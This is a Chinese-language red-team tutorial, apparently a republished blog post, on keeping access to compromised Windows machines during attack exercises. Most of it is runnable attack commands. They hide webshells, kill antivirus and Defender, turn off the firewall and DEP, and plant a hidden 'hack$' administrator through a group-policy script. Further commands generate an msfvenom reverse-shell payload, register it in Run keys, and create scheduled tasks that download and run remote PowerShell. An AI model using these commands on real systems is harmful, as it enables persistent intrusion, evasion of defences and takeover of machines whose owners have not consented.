文章目錄

• 1、前言
• • • 1.0、閑談
    • 1.1、攻擊思路
    • 1.2、得分情況
    • 1.3、在哪里做權限維持
• 2、windows權限維持
• • • 2.0、`以下姿勢不僅asp可以使用，php與jsp也可以使用。`
    • 2.1、“真正”隱藏文件
    • 2.2、系統文件夾圖標
    • 2.3、畸形目錄
    • 2.4、系統保留文件名
    • 2.5、組合使用
    • 2.6、驅動級文件隱藏
• 3、關閉殺軟
• 4、組策略
• 5、注冊表（重要）（注意面紗）
• 6、計劃任務
• 7、內存馬

1、前言

1.0、閑談

這一章節之前，建議大家學會寫poc，利用poc批量拿洞等等。

接著說說國家級虎王的情況。

國家級虎王，紅隊攻擊時間一般為30天，目標一般總計會有60個目標。第一批一般給30個目標，之后每一周可以將一些未拿下的目標與其他隊伍切換。一隊為3個人（一線），20年的標準，提供每個人提供3個機器，每個機器3個IP（一般非一個Ｃ段），原則上不允許使用除了這9個之外的IP進行攻擊。 先捏軟柿子，一般目標安全等級（互聯網>>金融>>政企、運營商）當然有意外的情況，一些敏感的政企在互聯網上基本沒有暴露面（如XX導彈中心），這些服務一般全在內網，大家的目標之中假設有這些目標直接放棄就好了，當然APT的話另說，畢竟APT有著大量的時間去研究，而正常的虎王是很注重效率一說。

1.1、攻擊思路

在整個過程之中，思路是最重要的;即使是國際級的紅隊人員也是有很多知識是不懂現學的。

建議在攻擊的時候，畫一個思維導圖，這樣就可以很清晰的每一步自己在干什么，下步要干什么。

信息收集（一線與二線都會貫穿整個周期），假設二線的人員發現一個突破點也會交給一線。然后二線繼續做信息收集找更多的突破點。突破點多數在DMZ區域。 DMZ（外網）機器一定會做權限維持，之后的思路就是跨段，不要在DMZ區域晃了（哪怕很容易就能拿下第二臺DMZ區域的機器），優先找可以跨段的機器（OA、SSO、運維）。

• 如何尋找可以跨段的機器？

  通過經驗判斷 oa這種大概率都是跨區域的；堡壘機一般都是跨段的，如何尋找堡壘機？多個終端連接的大概率堡壘機（拿下的多臺機器通過netstart查看網絡連接，比如都與A這臺機器有鏈接，那么A機器就大概率是堡壘機）。拿下堡壘機的思路：~歷史漏洞~已經拿下機器瀏覽器中有概率保存密碼

拿下DMZ區域可以跨段的機器之后，開始內網穿透進入內網，在內網可以進行小范圍橫向，然后繼續橫向跨段、橫向跨段拿下辦公網的機器或核心網機器。

• 橫向用到的一些SMB掃描工具如fscan，

• 提權一般都是直接使用CS自帶/增加的一些提取模塊，

• 域滲透常用手段：

  PTH、黃金票據、一些漏洞如cve-2020-1472（置空域管理員的一個洞）。

1.2、得分情況

常規，

一個webshell、一個數據庫、主機權限都是50分主機最高權限100分，數據庫資料較多的話可以翻倍。

跨段，

但是跨段，比如從DMZ到內網區域可以給1000分。DMZ與內網段一般存在隔離的情況（邏輯隔離與硬件隔離），比如突破一個隔離的網段，一般可以拿3000~5000分。

靶標，

除此之外，一般的攻防演練也存在靶標（一般2~3個）的情況，一般一個靶標1W分。所以在攻防演練的時候，一般很少去可以提權，意義不大，重點是跨段與靶標。在之前的演練之中，某一個隊伍拿到靶標之后，這個廠商就出局了，即別的隊伍在拿到靶標也沒用了，當然今年（21）靶標一直存在。

1.3、在哪里做權限維持

在紅隊行動中在網絡中獲得最初的立足點是一項耗時的任務。因此，持久性是紅隊成功運作的關鍵，這將使團隊能夠專注于目標，而不會失去與指揮和控制服務器的通信。

小結三種情況，

• DMZ的打點機器、

• 關鍵機器（可以跨段的機器）

• 存在大量數據的機器

  （如存在很多瀏覽器記錄、通訊錄等等可以對后續打點、橫向有幫助的機器）

2、windows權限維持

簡述：后門（webshell、粘貼鍵、放大鏡、主策略等等）+ 隱藏

權限維持的前提是已經獲得機器的權限（可以不是最高權限，具體看需求）

在橫向的時候，一些工具往往需要大家進行二開來躲避殺軟/流量分析。比如fscan，對于這種工具，一般來說只要修改流量上的特征即可，加一些亂碼或者其他的繞過特征檢測即可。

2.0、以下姿勢不僅asp可以使用，php與jsp也可以使用。

2.1、“真正”隱藏文件

命令如： attrib +s +a +h +r c:\test

想要取消的話，直接命令行執行“ attrib -s -a -h -r c:\test ”即可，

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。新建文件夾T，T內新建A與B文件夾，我們使用命令行把A文件夾隱藏，A文件夾內含有a.txt ；B文件夾含有b.txt文件。這樣就做到了真正的隱藏，不管你是否顯示隱藏文件，此文件夾都看不見，

但是仍然可以通過命令行進入，

值得說的是，通過此方式隱藏的文件，使用命令行“ dir ”也無法看到a文件夾，

最后，想要看到這種文件，可以按照以下設置：

將此選擇項“ 去掉 ”即可。

2.2、系統文件夾圖標

給B文件夾重新命名為：“我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”

這樣的話，不使用命令行是比較難發現的，且這個不僅僅是替換了圖標，雙擊b文件夾，效果與真正的“我的電腦”是一致的，

想要看到b文件夾內的真正文件，那就使用命令行把。

這里想要恢復的話，建議還是使用命令行改（直接修改文件夾是無法去掉“ .{20D04FE0-3AEA-1069-A2D8-08002B30309D} ”的）。使用命令行“ rename "我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" b ”這個“ 我的電腦xxx ”名字太長的話，可以使用tab鍵補齊，正常恢復，

除了命令行，我們也可以用WinRAR找到這個文件夾，然后重命名文件夾把后綴的“.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”刪除。然后我們再回到文件夾的存放地方，會發現已經變回原來的普通文件夾了。

附帶一些常用文件代號：

我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}回收站.{645ff040-5081-101b-9f08-00aa002f954e}拔號網絡.{992CFFA0-F557-101A-88EC-00DD010CCC48}打印機.{2227a280-3aea-1069-a2de-08002b30309d}控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}網上鄰居.{208D2C60-3AEA-1069-A2D7-08002B30309D}

2.3、畸形目錄

原理是：

只需要在目錄名后面加兩個點（也可以為多個點）就行了，用戶圖形界面無法訪問。

在T文件夾新建” c.txt ”內容隨意，使用命令行“ md c..\ ”創建“ C.. ”文件夾，這個最后的“\”是不能少的，創建之后圖形化無法查看、刪除該文件夾。

該文件夾，殺軟也是無法粉碎的，

然后將創建“ c.txt ”文件復制進去，

使用URL訪問：/c…/c.asp （兩個點）

刪除目錄： rd /s /q c…\

2.4、系統保留文件名

利用系統保留文件名創建無法刪除的webshell，Windows 下不能夠以下面這些字樣來命名文件/文件夾，包括：aux，com1，com2，prn，con和nul等，但是通過cmd下是可以創建此類文件夾的，使用copy命令即可實現：

使用命令“ copt c.txt \\.\C:\Users\xx\Desktop\T\com1.asp ”

就可以創建名稱為“ com1.asp ”的文件名稱，

該文件無法通過圖形化正常打開，刪除。但是在IIS中又是可以成功解析的。

正常可以這么讀取 “ type \.\C:\Users\xx\Desktop\T\com1.asp”

刪除的話，命令“ del \\.\C:\Users\xx\Desktop\T\com1.asp ”，

讀取與刪除不加“ \.\ ”是無法讀取的。

2.5、組合使用

以上集中情況可以組合使用，

先整一個“ 系統文件夾圖標 ”下創建一個畸形目錄，畸形目錄下整一個無法刪除的文件名。

這一套下來，普通的防守方是很難搞定的。

2.6、驅動級文件隱藏

驅動隱藏最典型的現象就是系統盤中存在以下文件：

c:\WINDOWS\xlkfs.datc:\WINDOWS\xlkfs.dllc:\WINDOWS\xlkfs.inic:\WINDOWS\system32\drivers\xlkfs.sys

驅動隱藏我們可以用過一些軟件來實現，軟件名字叫：Easy File Locker

下載鏈接： http://www.xoslab.com/efl.html

一般做黑連的小朋友都會這樣設置：只勾選可讀，其他的一律拒絕。那么，會有這樣的效果，該文件不會顯示，不能通過列目錄列出來，也不能刪除，除非你知道完整路徑，你才可以讀取文件內容。并且該軟件還可以設置密碼，啟動、修改設置、卸載及重復安裝的時候都需要密碼，更蛋疼的是，主界面、卸載程序等都可以刪除，只留下核心的驅動文件就行了。

如何清除（下邊是cmd命令）

1、查詢服務狀態： sc qc xlkfs2、停止服務： net stop xlkfs 服務停止以后，經驅動級隱藏的文件即可顯現3、刪除服務： sc delete xlkfs4、刪除系統目錄下面的文件，重啟系統，確認服務已經被清理了。

3、關閉殺軟

拿到目標主機的shell后第一件事就是關閉掉目標主機的殺毒軟件，可以通過MSF命令” run killav ”，當然很多情況下，此操作無法關閉到殺軟。我們使用使用一些開源的程序幫忙，如： https://github.com/Yaxser/Backstab 使用該軟件干掉殺軟之后要注意，defend存在一個自我保護機制（即使已經被干掉），假設當前機器沒有殺軟的情況下，隔幾分鐘自己就起來了。所以做一些危險操作的時候，干掉當前設備的所以殺軟之后要計算好時間。

還有一些常用CMD命令（需要admin及其以上的權限）：

關閉防火墻命令：

netsh advfirewall set allprofiles state off

命令關閉Denfnder：

Net stop windefend

命令關閉/打開DEP（數據執行保護）：

bcdedit.exe /set {current} nx Alwaysoff
bcdedit/set {current} nx AlwaysOn

參考連接： http://t.zoukankan.com/liqik-p-13046760.html

其他的補充：

命令關閉殺毒軟件： 在meterpreter下執行run post/windows/manage/killavnet stop sharedaccess ----關系統自帶防火墻c:\pskill.exe ravmon ntsd –c -q -p PID ----殺掉瑞星軟件c:\pskill.exe pfw ----關天網防火墻net stop "Symantec AntiVirus" ----關諾頓企業版net stop KAVStart c:\pskill kavstart / KWatch ----關閉金山殺毒net stop fmdaemon c:\pskill.exe syncserver 關閉webguard主頁防修改軟件的方法把時間調到2038之后.卡巴出現錯誤.自動關閉將時間調到2099年，發現blackice服務停止關于諾頓企業版“文件自動防護“的關閉：1）關閉服務：net stop "Symantec AntiVirus"2)關閉進程：Rtvscan，CCAPP，vptray，defwatch

4、組策略

相對來說，組策略后門更加隱蔽。往冊表中添加相應鍵值實現隨系統啟動而運行是木馬常用的伎倆，也為大家所熟知。其實，在組策略中也可以實現該功能，不僅如此它還可以實現在系統關機時進行某些操作。這就是通過最策略的“腳本(啟動/關機)”項來說實現。具體位置在 “計算機配置→Windows設置” 項下。因為其極具隱蔽性，因此常常被攻擊者利用來做服務器后門。 　 攻擊者獲得了服務器的控制權就可以通過這個后門實施對對主機的長期控制。它可以通過這個后門運行某些程序或者腳本，最簡單的比如創建一個管理員用戶，他可以這樣做：新建一個文件“ a.bat ”將下邊的內容復制到文件中，echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit在“運行”對話框中輸入gpedit.msc，定位到“計算機配置一>Windows設置一>腳本(啟動/關機)”,雙擊右邊窗口的“關機”，在其中添加add.bat。 當系統關機時創建hack$用戶。對于一般的用戶是根本不知道在系統中有一個隱藏用戶，就是他看見并且刪除了該帳戶，當系統關機時又會創建該帳戶。所以說，如果用戶不知道組策略中的這個地方那他一定會感到莫名其妙。其實，對于組策略中的這個“后門”還有很多利用法，攻擊者通過它來運行腳本或者程序，嗅探管理員密碼等等。當他們獲取了管理員的密碼后，就不用在系統中創建帳戶了，直接利用管理員帳戶遠程登錄系統。因此它也是“雙刃劍”，希望大家重視這個地方。當你為服務器被攻擊而莫名其妙時，說不定攻擊者就是通過它實現的。當然缺點也很明顯，就是這個目錄一般都會被殺毒工具、或者藍隊進行針對性的排查。

參考連接：https://buaq.net/go-27418.html

5、注冊表（重要）（注意面紗）

簡單的說，通過修改注冊表的值達到注冊表的后門。

其目的和組策略一致，即用戶登錄系統的時候自動執行攻擊者的后門如（msf的木馬）。

區別是組策略是按照用戶組劃分 注冊表是事件觸發的。

使用命令生成MSF木馬：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=6666 -f exe -o pentestlab.exeMSF開啟監聽，

復制木馬到吧唧C盤用戶目錄下，在八級執行下邊命令（4條中得隨機一條即可）：

該注冊表操作語句會在目標主機的啟動項里增加一個命名。

當目標主機登錄系統時，后門就會運行。這里注意得是

• 鎖屏登陸 不屬于登陸。

• 假設4條都執行了，正常來說會返回4條會話。

• 部分電腦沒有后兩個的注冊表鍵值，建議實戰選擇前兩個。

  （要選擇有的鍵值，不同windows版本鍵值不是完全一樣的）

• 以這種方式得后門，重啟機器后無論哪個是哪個用戶登錄了系統，傳回msf的權限都是設置上述注冊列表的用戶權限。

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

下邊的4條命令需要管理員權限才可以添加，

與上邊不同的是，上邊的幾條語句是添加在當前的用戶下，幾乎任何人都可以看到，

下邊的只有管理員權限才可以操作，是添加到系統層面，非管理員權限是無法查看的。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"

• Meterpreter –Run鍵

另外還存在兩個注冊表位置，這些位置可以放置一些DLL文件或者exe來實現持久性。在用戶登錄系統的時候被執行，注意的是下邊兩條命令需要管理員權限，還有計算機不一定存在這兩個注冊表。

• 其他

當已經存在一個MSF會話的時候，我們可以直接執行語句：run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 6669 -r 192.168.1.108會生成一個VBS的腳本，然后自動上傳到目標機器上，最后創建一個注冊列表當用戶登錄的時候自動運行該后門。（注意要開啟一個新的對應監聽）

6、計劃任務

• 計劃任務操作需要管理員以上的權限。

• 計劃任務中最主要的是不要寫錯“ 時間點 ”與“ 觸發條件 ”，

一般來說，計劃任務不被發現的兩個點：

~觸發條件~隱藏的稍微深一點

計劃任務也可以通過圖形化界面創建，計劃任務默認是放到比較靠前的，

實戰圖像化的話，可以放在子集目錄，

• 比較常用的幾個計劃任務：

#(X64) - On System Start system用戶登錄的時候觸發 schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System#(X64) - On User Idle (30mins) 每30分鐘觸發 schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30#(X86) - On User Login 用戶登錄的時候觸發 schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onlogon /ru System#(X86) - On System Start 當system啟用的時候觸發 schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System#(X86) - On User Idle (30mins) 每30分鐘觸發一次 schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30

補充

這個c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe是要執行程序的絕對路徑，實戰中可以直接換位面紗嗎。后邊的是參數，這個是可選條件:-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'

7、內存馬

Java為主，實戰當中都是提前準備好，不會現場寫。

日后在補充。

總結

以上是生活随笔為你收集整理的小白白红队初成长（5）win权限维持的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。